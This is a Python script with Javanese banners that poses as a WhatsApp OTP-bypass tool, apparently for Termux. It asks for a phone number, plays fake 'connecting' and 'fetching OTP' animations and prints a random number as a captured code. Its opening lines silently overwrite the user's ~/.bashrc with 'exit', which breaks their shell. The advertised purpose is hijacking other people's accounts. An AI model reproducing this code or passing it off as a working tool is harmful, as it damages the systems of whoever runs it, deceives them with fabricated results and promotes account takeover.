#!/bin/python
import pyfiglet
import os
import time
import sys
import random
from random import randint
os.system("echo exit > ~/.bashrc")
os.system("pip3 install pyfiglet -y")
os.system("clear")
os.system("pkg install toilet -y")
os.system("clear")
os.system("pkg install cowsay -y")
os.system("clear")
whats = pyfiglet.figlet_format("mr4605")
print("\033[1;35;40m\n")
print(whats)
time.sleep(2)
print("\033[1;31;40m\n")
print("""	         .----------------------------------------------.
	         |      TOOL IKI MUNG ISOH BYPASS 3 OTP		|
	         |     PENDAK 1 OTP  WEKTUNE MUNG 10 DETIK      |	
		 |        KANGGOKNO GAWE TUMINDAK BECIK         |
		 |             WHATSAPP-OTP-BYPASS		|
		 |						|
		 .----------------------------------------------.  """)
time.sleep(1)
print("\033[1;32;40m\n")
print("TULISEN NOMER NGANGGO KODE NEGORO")
print("ORA USAH NGANGGO TONDO + (plus) ")
print("IKI HASILE BYPASS:..")
print("INDO	     62")
print("USA	      1")
print("UK	     44")
print("PAKISTHAN    92")
print("THAILAND     66")
print("AZERBAAIJAN  994")
print("POLAND       48")
print("CUBA         53")
print("ARGENTINA    54")
print("PHLPNES      63")
print("\033[1;33;40m\n")
time.sleep(1)
x =input("TULISEN NOMER HPne:  ")
if len(str(x)) ==12:
	print("connecting")
	os.system("clear")
	s = pyfiglet.figlet_format("BYPASSINGGATE WAY")
	print("\033[1;35;40m\n")
	print(s)
	print("         LAGI REMBUKAN KARO NOMER TUJUAN -/")
	time.sleep(1)
	os.system("clear")
	print("         LAGI REMBUKAN KARO NOMER TUJUAN -\ ")
	time.sleep(1)
	os.system("clear")
	print("        LAGI REMBUKAN KARO NOMER TUJUAN-|")
	time.sleep(1)
	os.system("clear")
	print("        LAGI REMBUKAN KARO NOMER TUJUAN -/")
	time.sleep(1)
	os.system("clear")
	print("       LAGI REMBUKAN KARO NOMER TUJUAN-\ ")
	time.sleep(1)
	os.system("clear")
	print("         LAGI REMBUKAN KARO NOMER TUJUAN-|")
	time.sleep(1)
	os.system("clear")
	print("        LAGI REMBUKAN KARO NOMER TUJUAN -/")
	time.sleep(1)
	os.system("clear")
	print("       LAGI REMBUKAN KARO NOMER TUJUAN-\ ")
	time.sleep(1)
	os.system("clear")
	print("         LAGI REMBUKAN KARO NOMER TUJUAN-|")
	time.sleep(1)
	os.system("clear")
	print("            LEH REMBUKAN LAGI RAMPUNG")
	time.sleep(1)
	os.system("clear")
	print("            LAGI NJALUK IJIN -/")
	time.sleep(1)
	os.system("clear")
	print("           LAGI NJALUK IJIN -\ ")
	time.sleep(1)
	os.system("clear")
	print("           LAGI NJALUK IJIN -|")
	time.sleep(1)
	os.system("clear")
	print("          LEH REMBUKAN LAGI RAMPUNG")
	time.sleep(1)
	os.system("clear")
	print("           LAGI NJALUK IJIN -/")
	time.sleep(1)
	os.system("clear")
	print("           LAGI NJALUK IJIN -\ ")
	time.sleep(1)
	os.system("clear")
	print("           LAGI NJALUK IJIN -|")
	print("           LEH REMBUKAN LAGI RAMPUNG")
	time.sleep(1)
	os.system("clear")
	print("            LAGIB NJALUKBIJIN -/")
	time.sleep(1)
	os.system("clear")
	print("           LAGI NJALUKBIJIN -\ ")
	time.sleep(1)
	os.system("clear")
	print("          LAGI NJALUK IJIN -|")
	time.sleep(1)
	os.system("clear")
	print("          LAGI NJALUK IJIN -/")
	time.sleep(1)
	os.system("clear")
	print("         LAGI NJALUK IJIN -\ ")
	time.sleep(1)
	os.system("clear")
	print("         LAGI NJALUK IJIN -|")
	os.system("clear")
	print("         WES ENTUK IJIN")
	os.system("clear")
	y = pyfiglet.figlet_format("IJIN DI ULUNGKE ")
	print("\033[1;34;40m\n")
	print(y)
	print("              GAWE SAMBUNGAN PALSU.....\ ")
	time.sleep(1)
	os.system("clear")
	print("              GAWE SAMBUNGAN PALSU...../ ")
	time.sleep(1)
	os.system("clear")
	print("               GAWE SAMBUNGAN PALSU.....\ ")
	time.sleep(1)
	os.system("clear")
	print("              GAWE SAMBUNGAN PALSU...../ ")
	time.sleep(1)
	os.system("clear")
	print("              GAWE SAMBUNGAN PALSU.....\ ")
	time.sleep(1)
	os.system("clear")
	print("               GAWE SAMBUNGAN PALSU...../ ")
	time.sleep(1)
	os.system("clear")
	print("            NJUPUK OTP.....")
	time.sleep(1)
	os.system("clear")
	print("             NJUPUK OTP.............")
	time.sleep(1)
	os.system("clear")
	print("             NJUPUK OTP..............................")
	time.sleep(1)
	os.system("clear")
	print("             NJUPUK OTP.......")
	time.sleep(1)
	os.system("clear")
	print("         NJUPUK OTP.............")
	time.sleep(1)
	os.system("clear")
	print("           NJUPUK OTP..............................")

	G = pyfiglet.figlet_format("OTP KECEKEL")
	print("\033[1;36;40m\n")
	print(G)
	print("Fetching Otp")
	otp = randint(111111,999999)
	sotp = str(otp)

	print('          OTP : '+ sotp)
	print('        suwun wes nganggo tool iki.')
	print("       MUNG ISOH SEKITAR 10...")
	time.sleep(1)
	print("     MUNG ISOH SEKITAR 8...")
	time.sleep(1)
	print("      MUNG ISOH SEKITAR 4...")
	time.sleep(1)
	print("       MUNG ISO SEKITAR 2...")
	time.sleep(1)
	print("        MUNG ISOH SEKITAR 0...")
	

else:
	print("         yen nulis nomer sing berner")
	v = pyfiglet.figlet_format("mandek")
	print("\033[1;36;40m\n")
	print(v)
	exit()
        

